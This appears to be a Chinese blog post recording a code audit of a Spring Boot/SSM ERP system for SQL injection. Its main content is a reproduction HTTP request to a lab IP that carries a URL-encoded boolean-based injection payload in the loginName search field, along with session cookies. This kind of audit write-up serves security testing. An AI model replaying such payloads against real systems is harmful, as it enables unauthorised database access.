代码审计.springboot+ssm(erp).sql注入

于 2023-03-01 17:26:26 发布
阅读量134 收藏
点赞数
分类专栏: 网络安全 代码审计 文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34012951/article/details/129285856
版权

1、确定持久层框架,搜索关键特征

 

2、定位入口参数

 

 

 2、复现

 

GET /user/list?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22'%20and%201=2%20and%20'1%25'='1%22%7D&currentPage=1&pageSize=15 HTTP/1.1
Host: 10.0.112.77:8087
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://10.0.112.77:8087/pages/manage/user.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rememberMe=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; JSESSIONID=1DCFF4552E623B19B03EF71E2D63DF7A; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1677654788; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1677659123
Connection: close

Jaymin@gzm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值